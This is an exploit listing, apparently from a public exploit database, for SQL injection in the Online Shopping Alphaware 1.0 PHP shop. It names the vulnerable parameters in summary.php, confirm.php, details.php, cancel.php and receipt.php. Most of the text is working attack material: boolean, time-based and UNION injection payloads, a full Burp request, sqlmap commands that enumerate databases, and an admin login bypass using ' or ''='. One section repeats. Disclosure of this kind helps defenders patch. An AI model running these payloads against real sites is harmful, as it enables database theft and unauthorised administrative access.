Share 
## https://sploitus.com/exploit?id=PACKETSTORM:158779
# Exploit Title: Online Shopping Alphaware 1.0 - Multiple SQL Injection Vulnerabilty  
# Date: 2020-8-4  
# Exploit Author: Edo Maland  
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql  
# Version: 1.0  
# Tested On Windows & Linux Server  
  
-------------------------------------------------------------------------------------------------------------------------------------  
  
# Vulnerable file: summary.php  
# Vulnerable parameter :   
- tid  
  
# PoC  
  
URL : http://example.com/alphaware/summary.php?tid=1337 [SQLi]  
  
# Burpsuite Requests  
  
GET /alphaware/summary.php?tid=-3488%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7171626a71%2C%28CASE%20WHEN%20%28VERSION%28%29%20LIKE%200x254d61726961444225%29%20THEN%201%20ELSE%200%20END%29%2C0x716b706b71%29%2CNULL%2CNULL--%20- HTTP/1.1  
Cache-control: no-cache  
User-agent: Mozilla/5.0 (X11; U; Linux x86_64; ja; rv:1.9.1.4) Gecko/20091016 SUSE/3.5.4-1.1.2 Firefox/3.5.4  
Cookie: PHPSESSID=tp5rtgrqhq6mtcgrlv2ouo583n  
Host: example.com  
Accept: */*  
Accept-encoding: gzip,deflate  
Connection: close  
  
  
# Payload  
  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: http://example.com/alphaware/summary.php?tid=73' AND 4766=4766 AND 'eIaZ'='eIaZ  
Vector: AND [INFERENCE]  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: http://example.com/alphaware/summary.php?tid=73' AND (SELECT 5482 FROM (SELECT(SLEEP(5)))PeLB) AND 'zQKr'='zQKr  
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 5 columns  
Payload: http://example.com/alphaware/summary.php?tid=-4244' UNION ALL SELECT NULL,NULL,CONCAT(0x7171626a71,0x6573676f5948464d524243677248444168457a566250595976774178415053687041507a69507642,0x716b706b71),NULL,NULL-- -  
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL-- -  
  
  
  
# Sqlmap  
  
sqlmap -u "http://example.com/alphaware/summary.php?tid=1337*" --dbs --random-agent -v 3  
  
  
-------------------------------------------------------------------------------------------------------------------------------------  
  
# Vulnerable file: confirm.php  
# Vulnerable parameter :   
- id  
  
# PoC  
  
URL : http://example.com/alphaware/admin/confirm.php?id=0*[SQLi]  
  
  
# Payload  
  
Parameter: #1* (URI)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: http://example.com/alphaware/admin/confirm.php?id=0' AND (SELECT 1002 FROM (SELECT(SLEEP(5)))Yjjs) AND 'uFRa'='uFRa  
  
  
# Sqlmap  
  
  
sqlmap -u "http://example.com/alphaware/admin/confirm.php?id=0*" --dbs --random-agent -v 3  
  
-------------------------------------------------------------------------------------------------------------------------------------  
  
# Vulnerable file: details.php  
# Vulnerable parameter : id  
  
# PoC  
  
URL : http://example.com/alphaware/details.php?id=1337 [SQLi]  
  
  
# Payload  
  
Parameter: #1* (URI)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: http://example.com/alphaware/details.php?id=1337' AND (SELECT 6801 FROM (SELECT(SLEEP(5)))ogoi) AND 'vASd'='vASd  
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 7 columns  
Payload: http://example.com/alphaware/details.php?id=1337' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766b7871,0x6350686f52454b775559486d4a456859414a61424a6c724b72624f6d4554555471764a4d724a726f,0x71716b7171),NULL,NULL-- -  
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL-- -  
  
# Sqlmap  
  
sqlmap -u "http://example.com/alphaware/details.php?id=1337*" --dbs --random-agent -v 3  
  
  
  
-------------------------------------------------------------------------------------------------------------------------------------  
  
# Vulnerable file: confirm.php  
# Vulnerable parameter :   
- id  
  
# PoC  
  
URL :   
- http://example.com/alphaware/admin/confirm.php?id=0*[SQLi]  
- http://example.com/alphaware/admin/cancel.php?id=[SQLi]  
- http://example.com/alphaware/admin/receipt.php?tid=[SQLi]  
  
  
  
# Payload  
  
Parameter: #1* (URI)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: http://example.com/alphaware/admin/confirm.php?id=0' AND (SELECT 1002 FROM (SELECT(SLEEP(5)))Yjjs) AND 'uFRa'='uFRa  
  
  
# Sqlmap  
  
sqlmap -u "http://example.com/alphaware/admin/confirm.php?id=0*" --dbs --random-agent -v 3  
  
  
  
-------------------------------------------------------------------------------------------------------------------------------------  
  
URL : http://example.com/alphaware/admin/  
  
Bypass Login Using SQL on Admin/Member  
  
Logging in with following details:  
Username : ' or ''='  
Password : ' or ''='